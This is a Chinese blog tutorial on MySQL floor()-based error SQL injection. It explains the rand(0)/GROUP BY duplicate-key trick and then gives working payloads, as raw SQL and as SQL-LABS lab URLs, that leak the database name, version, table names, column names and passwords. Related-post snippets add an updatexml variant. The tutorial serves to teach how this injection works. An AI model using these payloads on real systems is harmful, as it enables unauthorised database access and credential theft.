MYSQL floor 报错注入详解

最新推荐文章于 2024-05-21 20:40:07 发布
最新推荐文章于 2024-05-21 20:40:07 发布
阅读量3.4k 收藏 23
点赞数 19
分类专栏: 学习 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45146120/article/details/100062786
版权

MYSQL floor 报错注入

  • floor() 函数,向下取整
  • rand() 函数,取随机数,若有参数x,则每个x对应一个固定的值,如果连续多次执行会变化,但是可以预测
  • floor( rand( 0 ) * 2 ) 产生的随机序列为011011…
原理

利用数据库表主键不能重复的原理,使用 GROUP BY 分组,产生主键key冗余,导致报错

  • GROUP BY 原理

已知表users如下

IDNAME
1AA
2AA
3BB

sql语句

select count(*) ,name from users group by name;

在进行分组运算的时候会根据name属性,创建一个虚拟表

从上至下扫描,当扫描到第一行NAME === AA 的时候

当前虚拟表没有该字段,那么插入此虚拟表,count = 1

countname
1AA

当扫描到第二行 NAME === AA 的时候

当前虚拟表存在该字段,那么count + 1

countname
2AA

当扫描到第三行 NAME === BB 的时候

当前虚拟表不存在该字段,执行插入,count = 1

countname
2AA
1BB

那么利用floor( rand( 0 ) * 2) 这个函数的返回值,进行分组,因为序列为011011…

那么构建SQL语句

SELECT COUNT(*),floor(RAND(0)*2) as x from users GROUP BY x

查询第一条记录,别名x 产生 键值0,当键值 0 不存在虚拟表时,执行插入,此时别名x是一个函数,是变量,在执行插入时,按照GROUP BY分组之时 又要执行floor函数,得到1 ,故向虚拟表中插入键值1,count = 1

COUNTx
11

查询第二条记录,别名x产生键值1,虚拟表中存在1,则令count + 1 = 2

COUNTx
21

查询第三条记录,别名x产生键值0,键值0不存在临时表,执行插入,别名x再次执行得键值1,由于1存在于临时表,那么插入之后如下表所示

COUNTx
21
11

由于数据库主键唯一性,现在临时表中存在两个键值为1,主键冗余,所以报错

由于数据库报错会将报错原因展示出来,故利用报错来实现注入

由上知,要保证floor报错注入,那么必须保证查询的表必须大于三条数据

SQL语句
  • 查询数据库
SELECT * FROM users WHERE id = 1 AND (SELECT 1 from 
(SELECT count(*),concat(0x23,
database(),
0x23,floor(rand(0)*2)) as x from information_schema.`COLUMNS` GROUP BY x) 
as y)

由于 and 后要跟1或者0,所以构造sql语句select 1 ,其中 concat()函数是用来连接字符串的函数,因为information_schema.'columns’的数据是大于3条,所以会出现报错,报错结果或将别名x的信息展示出来,展示信息为#(数据库名称)#1冗余

floor注入报错

  • 查询版本
SELECT * FROM users WHERE id = 1 AND (SELECT 1 from 
(SELECT count(*),concat(0x23,
version(),
0x23,floor(rand(0)*2)) as x from information_schema.`COLUMNS` GROUP BY x) 
as y)

floor报错注入

  • 查询数据库,表名,列名,字段等敏感信息

concat(0x23,version(),0x23,floor(rand(0)*2)) 中,在0x23之间,可以构造sql语句来实现爆表

在构造sql语句的时候,查询出来会是一张表结构,但是concat函数是连接字符串的函数,所以需要使用limit 函数来按需查询,只查询一条事务

  • 爆库
SELECT * FROM users WHERE id = 1 AND (SELECT 1 from 
(SELECT count(*),concat(0x23,
(SELECT schema_name from information_schema.schemata LIMIT 0,1),
0x23,floor(rand(0)*2)) as x 
from information_schema.`COLUMNS` GROUP BY x) 
as y)
  • 爆表
SELECT * FROM users WHERE id = 1 AND (SELECT 1 from 
(SELECT count(*),concat(0x23,
(SELECT table_name from information_schema.`TABLES` WHERE table_schema = database() LIMIT 0,1),
0x23,floor(rand(0)*2)) as x 
from information_schema.`COLUMNS` GROUP BY x) 
as y)
  • 爆列
SELECT * FROM users WHERE id = 1 AND (SELECT 1 from 
(SELECT count(*),concat(0x23,(SELECT column_name from information_schema.COLUMNS where table_name = 'users' LIMIT 0,1),
0x23,floor(rand(0)*2)) as x 
from information_schema.`COLUMNS` GROUP BY x) 
as y)
  • 爆字段
SELECT * FROM users WHERE id = 1 AND (SELECT 1 from 
(SELECT count(*),concat(0x23,
(SELECT `password` from users LIMIT 0,1),
0x23,floor(rand(0)*2)) as x from information_schema.`COLUMNS` GROUP BY x) 
as y)
SQL-LABS演示
  • 爆库
http://192.168.1.101/Less-1/?id=1' 
AND (SELECT 1 from 
(SELECT count(*),concat(0x23,
(SELECT schema_name from information_schema.schemata LIMIT 0,1),
0x23,floor(rand(0)*2)) as x from information_schema.`COLUMNS` GROUP BY x) 
as y)--+

SQL-LABS 构造闭合sql实现爆数据库

  • 爆表
http://192.168.1.101/Less-1/?id=1' 
AND (SELECT 1 from 
(SELECT count(*),concat(0x23,
(SELECT table_name from information_schema.`TABLES` WHERE table_schema = database() LIMIT 0,1),
0x23,floor(rand(0)*2)) as x from information_schema.`COLUMNS` GROUP BY x) 
as y)--+

SQL-LABS爆表

  • 爆列
http://192.168.1.101/Less-1/?id=1' 
AND (SELECT 1 from 
(SELECT count(*),concat(0x23,(SELECT column_name from information_schema.COLUMNS where table_name = 'users' LIMIT 0,1),
0x23,floor(rand(0)*2)) as x from information_schema.`COLUMNS` GROUP BY x) 
as y)--+

SQL-LABS floor报错注入爆列

  • 爆字段
http://192.168.1.101/Less-1/?id=1' 
AND (SELECT 1 from 
(SELECT count(*),concat(0x23,(SELECT `password` from users LIMIT 0,1),
0x23,floor(rand(0)*2)) as x from information_schema.`COLUMNS` GROUP BY x) 
as y)--+

SQL-LABS floor报错注入爆字段

Gundam-
关注
  • 19
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
mysqlfloor的用法_Mysql报错注入floor报错详解
weixin_32757449的博客
01-19 6824
?利用 select count(*),(floor(rand(0)*2))x from table group by x,导致数据库报错,通过 concat 函数,连接注入语句与 floor(rand(0)*2)函数,实现将注入结果与报错信息回显的注入方式。基本的查询 select 不必多说,剩下的几个关键字有 count 、group by 、floor、rand。二、关键函数说明?1.ran...
mysqlfloor方法_mysqlfloor()报错注入方法详细分析
weixin_29067143的博客
01-20 569
刚开始学习sql注入,遇见了 select count(*) from table group by floor(rand(0)*2); 这么条语句。本着刚开始学习一定要弄明白的态度,在此做个总结。(更好的阅读体验可访问 这里 )首先,只要该语句明白了,那么类似select count(*),(floor(rand(0)*2))x from table group by x;这样的变形语句基本上都...
深信服技术认证之基于floor( )函数的SQL报错注入
sangfor_edu的博客
06-07 1140
SQL注入(SQL Injection)是一种常见的Web安全漏洞,攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。...
Mysql报错注入floor报错详解
最新发布
qq_64395221的博客
05-21 796
​security1security1security1。
mysql floor报错_mysqlfloor()报错注入方法详细分析
weixin_39915605的博客
01-27 131
刚开始学习sql注入,遇见了 select count(*) from table group by floor(rand(0)*2); 这么条语句。在此做个总结。(更好的阅读体验可访问 这里 )首先,只要该语句明白了,那么类似select count(*),(floor(rand(0)*2))x from table group by x;这样的变形语句基本上都可以变通(这里只是起了个别名)。基...
MYSQL 通过floor() 报错注入
Ciyaso的博客
01-16 936
MYSQL floor() 报错注入 代码解释 floor() 函数,向下取整 rand() 函数,取随机数,若有参数x,则每个x对应一个固定的值,如果连续多次执行会变化,但是可以预测 floor( rand( 0 ) * 2 ) 产生的随机序列为011011… 原理 利用数据库表主键不能重复的原理,使用 GROUP BY 分组,产生主键key冗余,导致报错 已知表users如下 ID NAME 1 AA 2 AA 3 BB sql语句 select count(*) ,name
SQL注入floor报错注入的形成原理分析
Neonline254的博客
01-13 1092
进行SQL注入时,相信很多同学在遇到前端不回显时,会尝试SQL报错注入。常见的报错注入有:floor报错注入、updatexml报错注入和extractvalue报错注入等,不同于后两者利用Xpath解析错误,floor报错注入的成因更加复杂。本文将详细地分析floor报错注入的成因,希望能对您有所帮助。
Floor报错注入原理解析心得
qq_27130557的博客
10-22 2982
相关函数 1.floor() 向下取整。 即取不大于x的最大整数。取按照数轴上最接近要求值的左边值。 2.rand(x) 随机产生一个0-1之间的浮点数 当指定参数x之后,会生成固定的伪随机序列。即固定了参数,之后每次生成的值都是一样的,故称之为固定的伪随机数字(产生的数字都是可预知的) rand(0)*2 产生一个伪随机序列(结果已知),因为*2,所以返回结果只能是0或1 3.count(*) 返回值的条目,与count()的区别在于其不排除NULL,c..
Mysql报错注入详解.docx
11-20
Mysql报错注入详解.docxMysql报错注入详解.docx
MySQL五种报错注入1
08-04
MySQL五种报错注入是一种利用数据库的错误反馈信息来获取敏感数据的技术,通常在网站存在SQL注入漏洞时被攻击者利用。以下将详细介绍这些方法: 1. **数据库版本暴露** 利用`information_schema.tables`系统表和`...
MYSQL updatexml()函数报错注入解析
09-09
这个函数在处理XML数据时非常有用,但同时也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入的情况下,可能导致SQL报错注入。 `updatexml()`函数的基本语法如下: ```sql UPDATEXML(XML_document, XPath_...
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在Web应用程序中,当用户输入的数据被错误地用于构造数据库查询时,导致数据库返回错误信息。这些错误信息可能包含敏感数据,从而让攻击者能够获取未授权的信息或者控制数据库。...
Qt下使用mysql报错详解
04-10
根据自己在Qt5下使用mysql出现报错及解决方案总结的文档
mysql floor报错注入_mysql报错注入总结
weixin_33134401的博客
01-26 198
最近又深刻的研究了一下mysql报错注入,发现很多值得记录的东西,于是写了这篇博客做一个总结,目的是为了更深刻的理解报错注入报错注入原因及分类既然是研究报错注入,那我们先要弄明白为什么我们的注入语句会导致数据库报错,报错的原因我自己总结了一下,有以下几点重复数据报错,这里的重复主要有两个方面,其中之一是基于主键的唯一性:一个表主键必须是唯一的,如果一个表尝试生成两个相同的主键,就会爆出Dupli...
基于联合查询的字符型GET注入
Z_l123的博客
02-16 1085
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后报错! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
mysql floor报错注入_MySQL报错注入总结
weixin_31916045的博客
01-27 167
mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。报错注入:(and后不能直接跟select,可以加())1.报错注入floor---->(select 1 from (select count(*),concat((payload[]),floor(ra...
mysqlfloor()报错注入方法详细分析
weixin_30561177的博客
08-16 299
刚开始学习sql注入,遇见了 select count(*) from table group by floor(rand(0)*2); 这么条语句。在此做个总结。 (更好的阅读体验可访问 这里 ) 首先,只要该语句明白了,那么类似select count(*),(floor(rand(0)*2))x from table group by x;这样的变形语句基本上都可以变通(这里只是起...
mysql 数值处理函数 floor与round
flyinglzd2013的专栏
05-13 2210
mysql数值处理函数floor与round  mysql数值处理函数floor与round    在mysql中,当处理数值时,会用到数值处理函数,如有一个float型数值2.13,你想只要整数2,那就需要下面的函数floor与round。   floor:函数只返回整数部分,小数部分舍弃。 round:函数四舍五入,大于0.5的部分进位,不到则舍弃。与floor不同。如下测
mysqlfloor函数的作用是什么?
Ruby_One的博客
08-24 6805
需求描述:   最近写mysql程序的时候,使用了floor函数,在此记录下该函数的作用 操作过程: 1.使用floor函数的测试 mysql> select floor(1.23),floor(-1.23); +-------------+--------------+ | floor(1.23) | floor(-1.23) | +-------------+--------------+ | 1 | -2 | +-------------+-
mysql报错注入updatexml原理
05-17
MySQL 报错注入是一种利用错误信息披露漏洞来进行 SQL 注入攻击的方法。其中,updatexml 函数是一种常用的利用方式之一。 updatexml 函数可以用于对 XML 类型的数据进行操作。其基本语法如下: ``` updatexml(target_xml, xpath_expr, new_value) ``` 其中,target_xml 是待修改的 XML 数据,xpath_expr 是 XPath 表达式,new_value 是新的值。 在进行 SQL 注入攻击时,攻击者可以构造恶意的 xpath_expr 参数,使得 MySQL 数据库返回错误的信息,从而获取敏感信息。 具体实现方法可以参考以下示例: ``` SELECT updatexml(null,concat(0x7e,(SELECT user()),0x7e),null); ``` 在这个例子中,攻击者使用 concat 函数将波浪符号(0x7e)和当前用户的信息拼接成字符串,并作为 xpath_expr 参数传递给 updatexml 函数。由于这个参数不合法,MySQL 数据库会返回错误信息,其中包含了当前用户的信息。攻击者就可以从错误信息中获取敏感信息。 为了防止这种攻击,应该对用户输入进行严格的过滤和验证,避免恶意的输入。同时,也可以通过限制 MySQL 用户的权限来降低攻击的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值